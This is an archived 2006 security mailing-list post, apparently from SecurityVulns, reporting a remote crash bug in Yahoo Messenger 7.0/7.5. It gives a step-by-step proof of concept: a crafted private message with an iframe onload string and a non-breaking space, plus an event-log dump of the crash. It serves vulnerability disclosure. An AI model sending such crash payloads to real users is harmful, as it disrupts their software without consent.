Информационная безопасность
[RU] switch to English


Дополнительная информация

  DoS против Yahoo Messenger

  Yahoo messenger bug

  Yahoo messenger bug

From:Ivan Ivan <ivancool2003_(at)_yahoo.com.ar>
Date:22 июня 2006 г.
Subject:Yahoo messenger bug

Hi,
I found a vulnerability in yahoo messenger that if you receive a Private message with
this string "msg:---------------------------------------------iframe
onload=$InlineAction()>:)"(without quotes)Yahoo messenger will Crash with a runtime error.
 Remote crash proof of concept:
 1. Open messenger and log it.
 2. Open a yahoo chat third party like yahelite version 269 through Ymsgr protocol and
log it with another account.
 3. Send a Pm to the messenger account with this string: "s: msg
:---------------------------------------------iframe onload=$InlineAction()>:)" (without
quotes)
 4. The remote user will crash closing down her messenger.
 Note: "msg :" this space must be created with alt+0160.
 s:(space)msg(alt+0160):-----------------------------------------
----iframe
onload=$InlineAction()>:)
 
Tested in yahoo messenger 7.0/7.5
I didn't tried it in Yahoo messenger 8.0 Beta yet
This is the event log
0000: 41 70 70 6c 69 63 61 74   Applicat
0008: 69 6f 6e 20 46 61 69 6c   ion Fail
0010: 75 72 65 20 20 79 70 61   ure  ypa
0018: 67 65 72 2e 65 78 65 20   ger.exe
0020: 37 2e 30 2e 30 2e 34 33   7.0.0.43
0028: 38 20 69 6e 20 6a 73 63   8 in jsc
0030: 72 69 70 74 2e 64 6c 6c   ript.dll
0038: 20 35 2e 36 2e 30 2e 38    5.6.0.8
0040: 38 33 31 20 61 74 20 6f   831 at o
0048: 66 66 73 65 74 20 30 30   ffset 00
0050: 30 31 36 38 39 31 0d 0a   016891..
I have installed the latest version of jscript.dll but the problem continues.
So do you have any information about this issue?
I discover that it's a vulnerability exploited in the wild since february but i don't
have enough information.
 Regards

               
---------------------------------
1GB gratis, Antivirus y Antispam
Correo Yahoo!, el mejor correo web del mundo
Abrí tu cuenta aquí

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород